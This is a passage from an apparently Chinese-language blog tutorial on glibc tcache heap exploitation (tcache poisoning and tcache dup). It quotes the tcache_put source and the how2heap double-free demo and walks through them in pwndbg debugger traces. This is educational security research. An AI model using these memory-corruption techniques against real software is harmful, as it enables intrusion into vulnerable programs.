<span class="nf">rsp</span> <span class="mi">0x7fffffffdfa0</span> <span class="err">—▸</span> <span class="mi">0x555555554910</span> <span class="p">(</span><span class="no">__libc_csu_init</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">r15</span> <span class="err">01:0008│</span> <span class="nf">rax</span> <span class="no">rdx</span> <span class="mi">0x7fffffffdfa8</span> <span class="err">—▸</span> <span class="mi">0x555555554650</span> <span class="p">(</span><span class="no">_start</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">xor</span> <span class="no">ebp</span><span class="p">,</span> <span class="no">ebp</span> <span class="err">02:0010│</span> <span class="err">0</span><span class="nf">x7fffffffdfb0</span> <span class="err">—▸</span> <span class="mi">0x7fffffffe0a0</span> <span class="err">◂—</span> <span class="mi">0x1</span> <span class="err">03:0018│</span> <span class="err">0</span><span class="nf">x7fffffffdfb8</span> <span class="err">—▸</span> <span class="mi">0x555555756260</span> <span class="err">—▸</span> <span class="mi">0x7fffffffdfa8</span> <span class="err">—▸</span> <span class="mi">0x555555554650</span> <span class="p">(</span><span class="no">_start</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">xor</span> <span class="no">ebp</span><span class="p">,</span> <span class="no">ebp</span> <span class="err">04:0020│</span> <span class="nf">rbp</span> <span class="mi">0x7fffffffdfc0</span> <span class="err">—▸</span> <span class="mi">0x555555554910</span> <span class="p">(</span><span class="no">__libc_csu_init</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">r15</span> <span class="err">05:0028│</span> <span class="err">0</span><span class="nf">x7fffffffdfc8</span> <span class="err">—▸</span> <span class="mi">0x7ffff7a3fa87</span> <span class="p">(</span><span class="no">__libc_start_main</span><span class="err">+</span><span class="mi">231</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">mov</span> <span class="no">edi</span><span class="p">,</span> <span class="no">eax</span> <span class="err">06:0030│</span> <span class="err">0</span><span class="nf">x7fffffffdfd0</span> <span class="err">◂—</span> <span class="mi">0x0</span> <span class="err">07:0038│</span> <span class="err">0</span><span class="nf">x7fffffffdfd8</span> <span class="err">—▸</span> <span class="mi">0x7fffffffe0a8</span> <span class="err">—▸</span> <span class="mi">0x7fffffffe3c6</span> <span class="err">◂—</span> <span class="mi">0x346d2f656d6f682f</span> <span class="p">(</span><span class="err">&#39;/</span><span class="no">home</span><span class="err">/</span><span class="no">m4</span><span class="err">&#39;</span><span class="p">)</span> <span class="nf">pwndbg</span><span class="err">&gt;</span> <span class="no">i</span> <span class="no">r</span> <span class="no">rax</span> <span class="nf">rax</span> <span class="mi">0x7fffffffdfa8</span> <span class="mi">140737488347048</span> </code></pre></td></tr></table> </div> </div><p>可以看出 <code>tache posioning</code> 这种方法和 fastbin attack 类似，但因为没有 size 的限制有了更大的利用范围。</p> <h3 id="tcache-dup">tcache dup</h3> <p>类似 <code>fastbin dup</code>，不过利用的是 <code>tcache_put()</code> 的不严谨</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="k">static</span> <span class="n">__always_inline</span> <span class="kt">void</span> <span class="nf">tcache_put</span> <span class="p">(</span><span class="n">mchunkptr</span> <span class="n">chunk</span><span class="p">,</span> <span class="n">size_t</span> <span class="n">tc_idx</span><span class="p">)</span> <span class="p">{</span> <span class="n">tcache_entry</span> <span class="o">*</span><span class="n">e</span> <span class="o">=</span> <span class="p">(</span><span class="n">tcache_entry</span> <span class="o">*</span><span class="p">)</span> <span class="n">chunk2mem</span> <span class="p">(</span><span class="n">chunk</span><span class="p">);</span> <span class="n">assert</span> <span class="p">(</span><span class="n">tc_idx</span> <span class="o">&lt;</span> <span class="n">TCACHE_MAX_BINS</span><span class="p">);</span> <span class="n">e</span><span class="o">-&gt;</span><span class="n">next</span> <span class="o">=</span> <span class="n">tcache</span><span class="o">-&gt;</span><span class="n">entries</span><span class="p">[</span><span class="n">tc_idx</span><span class="p">];</span> <span class="n">tcache</span><span class="o">-&gt;</span><span class="n">entries</span><span class="p">[</span><span class="n">tc_idx</span><span class="p">]</span> <span class="o">=</span> <span class="n">e</span><span class="p">;</span> <span class="o">++</span><span class="p">(</span><span class="n">tcache</span><span class="o">-&gt;</span><span class="n">counts</span><span class="p">[</span><span class="n">tc_idx</span><span class="p">]);</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>可以看出，<code>tcache_put()</code> 的检查也可以忽略不计（甚至没有对 <code>tcache-&gt;counts[tc_idx]</code> 的检查），大幅提高性能的同时安全性也下降了很多。</p> <p>因为没有任何检查，所以我们可以对同一个 chunk 多次 free，造成 cycliced list。</p> <p>以 how2heap 的 <a href="https://github.com/shellphish/how2heap/blob/master/glibc_2.26/tcache_dup.c">tcache_dup</a> 为例分析，源码如下：</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="n">glibc_2</span><span class="mf">.26</span> <span class="p">[</span><span class="n">master</span><span class="err">●</span><span class="p">]</span> <span class="n">bat</span> <span class="p">.</span><span class="o">/</span><span class="n">tcache_dup</span><span class="p">.</span><span class="n">c</span> <span class="err">───────┬─────────────────────────────────────────────────────────────────────────────────</span> <span class="err">│</span> <span class="nl">File</span><span class="p">:</span> <span class="p">.</span><span class="o">/</span><span class="n">tcache_dup</span><span class="p">.</span><span class="n">c</span> <span class="err">───────┼─────────────────────────────────────────────────────────────────────────────────</span> <span class="mi">1</span> <span class="err">│</span> <span class="err">#</span><span class="n">include</span> <span class="o">&lt;</span><span class="n">stdio</span><span class="p">.</span><span class="n">h</span><span class="o">&gt;</span> <span class="mi">2</span> <span class="err">│</span> <span class="err">#</span><span class="n">include</span> <span class="o">&lt;</span><span class="n">stdlib</span><span class="p">.</span><span class="n">h</span><span class="o">&gt;</span> <span class="mi">3</span> <span class="err">│</span> <span class="mi">4</span> <span class="err">│</span> <span class="kt">int</span> <span class="n">main</span><span class="p">()</span> <span class="mi">5</span> <span class="err">│</span> <span class="p">{</span> <span class="mi">6</span> <span class="err">│</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">&#34;This file demonstrates a simple double-free attack with</span> <span class="err">│</span> <span class="n">tcache</span><span class="p">.</span><span class="err">\</span><span class="n">n</span><span class="s">&#34;);</span> <span class="mi">7</span> <span class="err">│</span> <span class="mi">8</span> <span class="err">│</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">&#34;Allocating buffer.</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> <span class="mi">9</span> <span class="err">│</span> <span class="kt">int</span> <span class="o">*</span><span class="n">a</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">8</span><span class="p">);</span> <span class="mi">10</span> <span class="err">│</span> <span class="mi">11</span> <span class="err">│</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">&#34;malloc(8): %p</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">a</span><span class="p">);</span> <span class="mi">12</span> <span class="err">│</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">&#34;Freeing twice...</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> <span class="mi">13</span> <span class="err">│</span> <span class="n">free</span><span class="p">(</span><span class="n">a</span><span class="p">);</span> <span class="mi">14</span> <span class="err">│</span> <span class="n">free</span><span class="p">(</span><span class="n">a</span><span class="p">);</span> <span class="mi">15</span> <span class="err">│</span> <span class="mi">16</span> <span class="err">│</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">&#34;Now the free list has [ %p, %p ].</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">a</span><span class="p">);</span> <span class="mi">17</span> <span class="err">│</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">&#34;Next allocated buffers will be same: [ %p, %p ].</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">ma</span> <span class="err">│</span> <span class="n">lloc</span><span class="p">(</span><span class="mi">8</span><span class="p">),</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">8</span><span class="p">));</span> <span class="mi">18</span> <span class="err">│</span> <span class="mi">19</span> <span class="err">│</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="mi">20</span> <span class="err">│</span> <span class="p">}</span> <span class="err">───────┴─────────────────────────────────────────────────────────────────────────────────</span> </code></pre></td></tr></table> </div> </div><p>调试一下，第一次 free</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-asm" data-lang="asm"><span class="nf">pwndbg</span><span class="err">&gt;</span> <span class="no">n</span> <span class="err">14</span> <span class="nf">free</span><span class="p">(</span><span class="no">a</span><span class="p">)</span><span class="c">; </span><span class="c"></span><span class="no">LEGEND</span><span class="p">:</span> <span class="no">STACK</span> <span class="err">|</span> <span class="no">HEAP</span> <span class="err">|</span> <span class="no">CODE</span> <span class="err">|</span> <span class="no">DATA</span> <span class="err">|</span> <span class="no">RWX</span> <span class="err">|</span> <span class="no">RODATA</span> <span class="err">──────────────────────────────────────[</span> <span class="nf">REGISTERS</span> <span class="p">]</span><span class="err">──────────────────────────────────────</span> <span class="nf">RAX</span> <span class="mi">0x0</span> <span class="nf">RBX</span> <span class="mi">0x0</span> <span class="nf">RCX</span> <span class="mi">0x0</span> <span class="nf">RDX</span> <span class="mi">0x0</span> <span class="nf">RDI</span> <span class="mi">0x1</span> <span class="nf">RSI</span> <span class="mi">0x555555756010</span> <span class="err">◂—</span> <span class="mi">0x1</span> <span class="nf">R8</span> <span class="mi">0x0</span> <span class="nf">R9</span> <span class="mi">0x7fffffffb79c</span> <span class="err">◂—</span> <span class="mi">0x1a00000000</span> <span class="nf">R10</span> <span class="mi">0x911</span> <span class="nf">R11</span> <span class="mi">0x7ffff7aa0ba0</span> <span class="p">(</span><span class="no">free</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">rbx</span> <span class="nf">R12</span> <span class="mi">0x555555554650</span> <span class="p">(</span><span class="no">_start</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">xor</span> <span class="no">ebp</span><span class="p">,</span> <span class="no">ebp</span> <span class="nf">R13</span> <span class="mi">0x7fffffffe0b0</span> <span class="err">◂—</span> <span class="mi">0x1</span> <span class="nf">R14</span> <span class="mi">0x0</span> <span class="nf">R15</span> <span class="mi">0x0</span> <span class="nf">RBP</span> <span class="mi">0x7fffffffdfd0</span> <span class="err">—▸</span> <span class="mi">0x555555554870</span> <span class="p">(</span><span class="no">__libc_csu_init</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">r15</span> <span class="nf">RSP</span> <span class="mi">0x7fffffffdfb0</span> <span class="err">—▸</span> <span class="mi">0x555555554870</span> <span class="p">(</span><span class="no">__libc_csu_init</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">r15</span> <span class="nf">RIP</span> <span class="mi">0x5555555547fc</span> <span class="p">(</span><span class="no">main</span><span class="err">+</span><span class="mi">162</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">mov</span> <span class="no">rax</span><span class="p">,</span> <span class="no">qword</span> <span class="no">ptr</span> <span class="p">[</span><span class="no">rbp</span> <span class="p">-</span> <span class="mi">0x18</span><span class="p">]</span> <span class="err">───────────────────────────────────────[</span> <span class="nf">DISASM</span> <span class="p">]</span><span class="err">────────────────────────────────────────</span> <span class="err">0</span><span class="nf">x5555555547e4</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">138</span><span class="err">&gt;</span> <span class="no">lea</span> <span class="no">rdi</span><span class="p">,</span> <span class="p">[</span><span class="no">rip</span> <span class="err">+</span> <span class="mi">0x171</span><span class="p">]</span> <span class="err">0</span><span class="nf">x5555555547eb</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">145</span><span class="err">&gt;</span> <span class="no">call</span> <span class="no">fwrite@plt</span> <span class="err">&lt;</span><span class="mi">0x555555554630</span><span class="err">&gt;</span> <span class="err">0</span><span class="nf">x5555555547f0</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">150</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">rax</span><span class="p">,</span> <span class="no">qword</span> <span class="no">ptr</span> <span class="p">[</span><span class="no">rbp</span> <span class="p">-</span> <span class="mi">0x18</span><span class="p">]</span> <span class="err">0</span><span class="nf">x5555555547f4</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">154</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">rdi</span><span class="p">,</span> <span class="no">rax</span> <span class="err">0</span><span class="nf">x5555555547f7</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">157</span><span class="err">&gt;</span> <span class="no">call</span> <span class="no">free@plt</span> <span class="err">&lt;</span><span class="mi">0x555555554600</span><span class="err">&gt;</span> <span class="err">►</span> <span class="err">0</span><span class="nf">x5555555547fc</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">162</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">rax</span><span class="p">,</span> <span class="no">qword</span> <span class="no">ptr</span> <span class="p">[</span><span class="no">rbp</span> <span class="p">-</span> <span class="mi">0x18</span><span class="p">]</span> <span class="err">0</span><span class="nf">x555555554800</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">166</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">rdi</span><span class="p">,</span> <span class="no">rax</span> <span class="err">0</span><span class="nf">x555555554803</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">169</span><span class="err">&gt;</span> <span class="no">call</span> <span class="no">free@plt</span> <span class="err">&lt;</span><span class="mi">0x555555554600</span><span class="err">&gt;</span> <span class="err">0</span><span class="nf">x555555554808</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">174</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">rax</span><span class="p">,</span> <span class="no">qword</span> <span class="no">ptr</span> <span class="p">[</span><span class="no">rip</span> <span class="err">+</span> <span class="mi">0x200851</span><span class="p">]</span> <span class="err">&lt;</span><span class="mi">0x555555755060</span><span class="err">&gt;</span> <span class="err">0</span><span class="nf">x55555555480f</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">181</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">rcx</span><span class="p">,</span> <span class="no">qword</span> <span class="no">ptr</span> <span class="p">[</span><span class="no">rbp</span> <span class="p">-</span> <span class="mi">0x18</span><span class="p">]</span> <span class="err">0</span><span class="nf">x555555554813</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">185</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">rdx</span><span class="p">,</span> <span class="no">qword</span> <span class="no">ptr</span> <span class="p">[</span><span class="no">rbp</span> <span class="p">-</span> <span class="mi">0x18</span><span class="p">]</span> <span class="err">────────────────────────────────────[</span> <span class="nf">SOURCE</span> <span class="p">(</span><span class="no">CODE</span><span class="p">)</span> <span class="p">]</span><span class="err">────────────────────────────────────</span> <span class="err">9</span> <span class="nf">int</span> <span class="p">*</span><span class="no">a</span> <span class="err">=</span> <span class="no">malloc</span><span class="p">(</span><span class="mi">8</span><span class="p">)</span><span class="c">; </span><span class="c"></span> <span class="mi">10</span> <span class="mi">11</span> <span class="no">fprintf</span><span class="p">(</span><span class="no">stderr</span><span class="p">,</span> <span class="err">&#34;</span><span class="no">malloc</span><span class="p">(</span><span class="mi">8</span><span class="p">):</span> <span class="nv">%p</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">,</span> <span class="no">a</span><span class="p">)</span><span class="c">; </span><span class="c"></span> <span class="mi">12</span> <span class="no">fprintf</span><span class="p">(</span><span class="no">stderr</span><span class="p">,</span> <span class="err">&#34;</span><span class="no">Freeing</span> <span class="no">twice...</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">)</span><span class="c">; </span><span class="c"></span> <span class="mi">13</span> <span class="no">free</span><span class="p">(</span><span class="no">a</span><span class="p">)</span><span class="c">; </span><span class="c"></span> <span class="err">►</span> <span class="mi">14</span> <span class="no">free</span><span class="p">(</span><span class="no">a</span><span class="p">)</span><span class="c">; </span><span class="c"></span> <span class="mi">15</span> <span class="mi">16</span> <span class="no">fprintf</span><span class="p">(</span><span class="no">stderr</span><span class="p">,</span> <span class="err">&#34;</span><span class="no">Now</span> <span class="no">the</span> <span class="no">free</span> <span class="no">list</span> <span class="no">has</span> <span class="p">[</span> <span class="nv">%p</span><span class="p">,</span> <span class="nv">%p</span> <span class="p">].</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">,</span> <span class="no">a</span><span class="p">,</span> <span class="no">a</span><span class="p">)</span><span class="c">; </span><span class="c"></span> <span class="mi">17</span> <span class="no">fprintf</span><span class="p">(</span><span class="no">stderr</span><span class="p">,</span> <span class="err">&#34;</span><span class="no">Next</span> <span class="no">allocated</span> <span class="no">buffers</span> <span class="no">will</span> <span class="no">be</span> <span class="no">same</span><span class="p">:</span> <span class="p">[</span> <span class="nv">%p</span><span class="p">,</span> <span class="nv">%p</span> <span class="p">].</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">,</span> <span class="no">malloc</span><span class="p">(</span><span class="mi">8</span><span class="p">),</span> <span class="no">malloc</span><span class="p">(</span><span class="mi">8</span><span class="p">))</span><span class="c">; </span><span class="c"></span> <span class="mi">18</span> <span class="mi">19</span> <span class="no">return</span> <span class="mi">0</span><span class="c">; </span><span class="c"></span><span class="err">────────────────────────────────────────</span><span class="p">[</span> <span class="no">STACK</span> <span class="p">]</span><span class="err">────────────────────────────────────────</span> <span class="err">00:0000│</span> <span class="nf">rsp</span> <span class="mi">0x7fffffffdfb0</span> <span class="err">—▸</span> <span class="mi">0x555555554870</span> <span class="p">(</span><span class="no">__libc_csu_init</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">r15</span> <span class="err">01:0008│</span> <span class="err">0</span><span class="nf">x7fffffffdfb8</span> <span class="err">—▸</span> <span class="mi">0x555555756260</span> <span class="err">◂—</span> <span class="mi">0x0</span> <span class="err">02:0010│</span> <span class="err">0</span><span class="nf">x7fffffffdfc0</span> <span class="err">—▸</span> <span class="mi">0x7fffffffe0b0</span> <span class="err">◂—</span> <span class="mi">0x1</span> <span class="err">03:0018│</span> <span class="err">0</span><span class="nf">x7fffffffdfc8</span> <span class="err">◂—</span> <span class="mi">0x0</span> <span class="err">04:0020│</span> <span class="nf">rbp</span> <span class="mi">0x7fffffffdfd0</span> <span class="err">—▸</span> <span class="mi">0x555555554870</span> <span class="p">(</span><span class="no">__libc_csu_init</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">r15</span> <span class="err">05:0028│</span> <span class="err">0</span><span class="nf">x7fffffffdfd8</span> <span class="err">—▸</span> <span class="mi">0x7ffff7a3fa87</span> <span class="p">(</span><span class="no">__libc_start_main</span><span class="err">+</span><span class="mi">231</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">mov</span> <span class="no">edi</span><span class="p">,</span> <span class="no">eax</span> <span class="err">06:0030│</span> <span class="err">0</span><span class="nf">x7fffffffdfe0</span> <span class="err">◂—</span> <span class="mi">0x0</span> <span class="err">07:0038│</span> <span class="err">0</span><span class="nf">x7fffffffdfe8</span> <span class="err">—▸</span> <span class="mi">0x7fffffffe0b8</span> <span class="err">—▸</span> <span class="mi">0x7fffffffe3d8</span> <span class="err">◂—</span> <span class="mi">0x346d2f656d6f682f</span> <span class="p">(</span><span class="err">&#39;/</span><span class="no">home</span><span class="err">/</span><span class="no">m4</span><span class="err">&#39;</span><span class="p">)</span> <span class="nf">pwndbg</span><span class="err">&gt;</span> <span class="no">heapinfo</span> <span class="err">3886144</span> <span class="err">(0</span><span class="nf">x20</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">0</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x30</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">1</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x40</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">2</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x50</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">3</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x60</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">4</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x70</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">5</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x80</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">6</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x90</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">7</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">xa0</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">8</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">xb0</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">9</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="nl">top:</span> <span class="err">0</span><span class="nf">x555555756270</span> <span class="p">(</span><span class="no">size</span> <span class="p">:</span> <span class="mi">0x20d90</span><span class="p">)</span> <span class="no">last_remainder</span><span class="p">:</span> <span class="mi">0x0</span> <span class="p">(</span><span class="no">size</span> <span class="p">:</span> <span class="mi">0x0</span><span class="p">)</span> <span class="no">unsortbin</span><span class="p">:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x20</span><span class="p">)</span> <span class="no">tcache_entry</span><span class="p">[</span><span class="mi">0</span><span class="p">]:</span> <span class="mi">0x555555756260</span> </code></pre></td></tr></table> </div> </div><p>tcache 的第一条链放入了一个 chunk</p> <p>第二次 free 时，虽然 free 的是同一个 chunk，但因为 <code>tcache_put()</code> 没有做任何检查，因此程序不会 crash</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-asm" data-lang="asm"><span class="nf">pwndbg</span><span class="err">&gt;</span> <span class="no">n</span> <span class="err">16</span> <span class="nf">fprintf</span><span class="p">(</span><span class="no">stderr</span><span class="p">,</span> <span class="err">&#34;</span><span class="no">Now</span> <span class="no">the</span> <span class="no">free</span> <span class="no">list</span> <span class="no">has</span> <span class="p">[</span> <span class="nv">%p</span><span class="p">,</span> <span class="nv">%p</span> <span class="p">].</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">,</span> <span class="no">a</span><span class="p">,</span> <span class="no">a</span><span class="p">)</span><span class="c">; </span><span class="c"></span><span class="no">LEGEND</span><span class="p">:</span> <span class="no">STACK</span> <span class="err">|</span> <span class="no">HEAP</span> <span class="err">|</span> <span class="no">CODE</span> <span class="err">|</span> <span class="no">DATA</span> <span class="err">|</span> <span class="no">RWX</span> <span class="err">|</span> <span class="no">RODATA</span> <span class="err">──────────────────────────────────────[</span> <span class="nf">REGISTERS</span> <span class="p">]</span><span class="err">──────────────────────────────────────</span> <span class="nf">RAX</span> <span class="mi">0x0</span> <span class="nf">RBX</span> <span class="mi">0x0</span> <span class="nf">RCX</span> <span class="mi">0x0</span> <span class="nf">RDX</span> <span class="mi">0x555555756260</span> <span class="err">◂—</span> <span class="mi">0x555555756260</span> <span class="err">/</span><span class="p">*</span> <span class="err">&#39;`</span><span class="no">buUUU</span><span class="err">&#39;</span> <span class="p">*</span><span class="err">/</span> <span class="nf">RDI</span> <span class="mi">0x2</span> <span class="nf">RSI</span> <span class="mi">0x555555756010</span> <span class="err">◂—</span> <span class="mi">0x2</span> <span class="nf">R8</span> <span class="mi">0x1</span> <span class="nf">R9</span> <span class="mi">0x7fffffffb79c</span> <span class="err">◂—</span> <span class="mi">0x1a00000000</span> <span class="nf">R10</span> <span class="mi">0x911</span> <span class="nf">R11</span> <span class="mi">0x7ffff7aa0ba0</span> <span class="p">(</span><span class="no">free</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">rbx</span> <span class="nf">R12</span> <span class="mi">0x555555554650</span> <span class="p">(</span><span class="no">_start</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">xor</span> <span class="no">ebp</span><span class="p">,</span> <span class="no">ebp</span> <span 